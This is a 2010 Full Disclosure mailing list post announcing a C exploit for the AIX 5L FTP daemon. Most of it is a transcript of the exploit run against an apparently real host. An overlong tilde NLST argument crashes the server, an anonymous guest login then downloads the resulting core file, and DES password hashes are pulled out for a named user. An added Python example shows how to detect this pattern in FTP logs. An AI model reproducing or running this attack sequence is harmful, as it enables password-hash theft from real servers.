Full Disclosure mailing list archives

Advanced AIX 5l FTPd Exploit


From: "HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>
Date: Fri, 23 Jul 2010 05:27:03 +0200

Attached is another version of my AIX 5l FTPd exploit written in C to be
more portable & powerful between hosts :>

The Exploit in action:

[root@vs2067037 kcope]# ./aix -h ftp.ABABABABABA.edu -i 85.25.67.37 -c
jkateley
<       220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
populating DES hash in memory...
      USER jkateley
<       331 Password required for jkateley.
      PASS abcdef
<       530 Login incorrect.
      USER jkateley
<       331 Password required for jkateley.
      PASS abcdef
<       530 Login incorrect.
      USER jkateley
<       331 Password required for jkateley.
      PASS abcdef
<       530 Login incorrect.
logging in...
      USER ftp
<       331 Guest login ok, send ident as password.
      PASS guest
<       230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh
from docsis1-137
230-Last login: Thu Jul 22 21:12:23 MDT 2010 on ftp from
vs2067037.vserver.de
<       230 Guest login ok, access restrictions apply.
changing directory...
      CWD pub
<       250 CWD command successful.
triggering segmentation violation...
      NLST
~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
trigger succeeded!
<       220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
logging in 2nd time...
      USER ftp
<       331 Guest login ok, send ident as password.
      PASS guest
<       230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh
from docsis1-137
230-Last login: Thu Jul 22 21:12:33 MDT 2010 on ftp from
vs2067037.vserver.de
<       230 Guest login ok, access restrictions apply.
changing directory...
      CWD pub
<       250 CWD command successful.
getting core file...
      TYPE I
<       200 Type set to I.
      PORT 85,25,67,37,98,23
<       200 PORT command successful.
      RETR core
<       150 Opening data connection for core (3979727 bytes).
finally extracting DES hashes from core file for user 'jkateley'...
done.
[root@vs2067037 kcope]#

Attachment: aix.c
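As an added defender-side example (not part of the post or of the attached aix.c), the sequence visible in the transcript above, an overlong tilde-prefixed NLST argument followed by an anonymous RETR of the resulting core file, can be flagged from an FTP command audit log. The log format, the sample lines and the thresholds are constructed for illustration:

```python
import re
from collections import defaultdict

# Constructed sample of an FTP command audit log, one command per line:
# "<client-ip> <COMMAND> [argument]". Not taken from the post.
SAMPLE_LOG = [
    "85.25.67.37 USER jkateley",
    "85.25.67.37 PASS ******",
    "85.25.67.37 USER ftp",
    "85.25.67.37 PASS guest",
    "85.25.67.37 CWD pub",
    "85.25.67.37 NLST ~" + "A" * 600,     # overlong tilde argument, server crashes
    "85.25.67.37 USER ftp",               # reconnect after the crash
    "85.25.67.37 PASS guest",
    "85.25.67.37 CWD pub",
    "85.25.67.37 TYPE I",
    "85.25.67.37 RETR core",              # fetch the core dump left in pub/
    "10.0.0.5 USER alice",
    "10.0.0.5 PASS ******",
    "10.0.0.5 NLST ~/reports",            # benign short tilde expansion
    "10.0.0.5 RETR report.txt",
]

MAX_LIST_ARG = 255                  # assumed threshold; legitimate globs are far shorter
ANON_USERS = {"ftp", "anonymous"}
CORE_NAME = re.compile(r"core(\.\d+)?")   # "core" or "core.<pid>" basenames

def detect(lines):
    """Return (client, reason) findings: an overlong '~' argument to a listing
    command, and an anonymous RETR of a core file (rated high if the same
    client previously sent the overlong argument)."""
    findings = []
    anon = defaultdict(bool)          # client -> currently logged in anonymously?
    sent_overlong = defaultdict(bool) # client -> sent an overlong tilde argument?
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 2:
            continue
        client, cmd = parts[0], parts[1].upper()
        arg = parts[2] if len(parts) == 3 else ""
        if cmd == "USER":
            anon[client] = arg.lower() in ANON_USERS
        elif cmd in ("NLST", "LIST", "STAT") and arg.startswith("~") and len(arg) > MAX_LIST_ARG:
            sent_overlong[client] = True
            findings.append((client, f"overlong tilde argument to {cmd} ({len(arg)} bytes)"))
        elif cmd == "RETR" and anon[client] and CORE_NAME.fullmatch(arg.rsplit("/", 1)[-1]):
            severity = "high" if sent_overlong[client] else "medium"
            findings.append((client, f"anonymous RETR of core dump ({severity})"))
    return findings
```

Run against SAMPLE_LOG, `detect` reports the overlong NLST and the anonymous core retrieval from 85.25.67.37 and nothing for the benign client.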

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
